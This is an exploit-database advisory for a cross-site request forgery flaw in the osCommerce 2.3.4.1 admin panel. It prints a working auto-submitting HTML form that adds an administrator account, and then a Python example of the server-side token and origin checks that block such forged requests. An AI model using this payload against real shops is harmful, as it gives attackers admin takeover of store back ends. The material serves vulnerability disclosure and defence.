osCommerce 2.3.4.1 Cross Site Request Forgery Vulnerability

2018-09-06T00:00:00
ID 1337DAY-ID-31042
Type zdt
Reporter Hesam Bazvand
Modified 2018-09-06T00:00:00

Description

Exploit for php platform in category web applications

# Exploit Title: osCommerce Add Admin User CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Download Link: https://www.oscommerce.com/Products&Download=oscom2341
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

exploit:

<html>
<body name="administrator" onLoad="document.administrator.submit();">
<form name="administrator" action="http://localhost/osCommerce/admin/administrators.php?action=insert" method="post">
<input type="hidden" name="username" value="secuser" />
<input type="hidden" name="password" value="Your" />
<input type="hidden" name="htaccess" value="false" />
</form>
</body>
</html>
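The request above succeeds because the admin insert action trusts nothing beyond the victim's session cookie, which the browser attaches to any cross-site form submission. The following is an added example (not code from the advisory or from osCommerce) of the server-side gate a state-changing admin action needs: a per-session synchronizer token embedded in the panel's own forms and compared in constant time, plus an Origin/Referer same-origin check as defence in depth. `ADMIN_ORIGIN`, the `csrf_token` field name, and the three request dictionaries are constructed for this illustration; the "forged" request mirrors the auto-submitted form shown above.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin the admin panel is served from (assumption for this example;
# matches the localhost target used in the advisory's form).
ADMIN_ORIGIN = "http://localhost"


def issue_csrf_token(session: dict) -> str:
    """Create a per-session secret and store it server-side.

    The same value is embedded as a hidden field in every state-changing
    admin form (e.g. the administrators.php insert form). A page on another
    origin cannot read it, so it cannot assemble a complete request.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def request_is_same_origin(headers: dict) -> bool:
    """Defence in depth: a browser-submitted form carries Origin (or at
    least Referer). Reject requests from another site or with neither."""
    origin = headers.get("Origin")
    if origin:
        return origin == ADMIN_ORIGIN
    referer = headers.get("Referer")
    if referer:
        return _origin_of(referer) == ADMIN_ORIGIN
    return False


def request_is_csrf_safe(form: dict, headers: dict, session: dict) -> bool:
    """Gate for a state-changing action such as ?action=insert.

    Both checks must pass: the request originates from the admin site AND
    the submitted token matches the session token (constant-time compare,
    so a mismatch leaks nothing about the stored value through timing).
    """
    if not request_is_same_origin(headers):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def demo() -> dict:
    """Run the gate over three constructed requests and report the verdicts."""
    session = {"admin_logged_in": True}
    token = issue_csrf_token(session)

    # Constructed request 1: the legitimate form rendered by the panel
    # itself, carrying the session's token.
    legit_form = {"username": "secuser", "password": "...", "htaccess": "false",
                  "csrf_token": token}
    legit_headers = {"Origin": ADMIN_ORIGIN,
                     "Referer": f"{ADMIN_ORIGIN}/osCommerce/admin/administrators.php"}

    # Constructed request 2: the auto-submitted cross-site form from the
    # advisory. The browser attaches the victim's cookie, but the page cannot
    # know the token, and Origin names the third-party site hosting it.
    forged_form = {"username": "secuser", "password": "Your", "htaccess": "false"}
    forged_headers = {"Origin": "http://attacker.example",
                      "Referer": "http://attacker.example/lure.html"}

    # Constructed request 3: same body, but Origin/Referer were stripped
    # (e.g. by a referrer policy). Still rejected: no origin and no token.
    stripped_headers = {}

    return {
        "legit": request_is_csrf_safe(legit_form, legit_headers, session),
        "forged": request_is_csrf_safe(forged_form, forged_headers, session),
        "stripped": request_is_csrf_safe(forged_form, stripped_headers, session),
    }


if __name__ == "__main__":
    print(demo())  # {'legit': True, 'forged': False, 'stripped': False}
```

The token check is the actual fix; the origin check alone is not sufficient, because some clients and policies omit Referer, and treating an absent header as trusted would reopen the hole. Rejecting when neither header is present is the conservative choice for an admin panel, where every legitimate submission comes from the panel's own pages.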

#  0day.today [2018-09-07]  #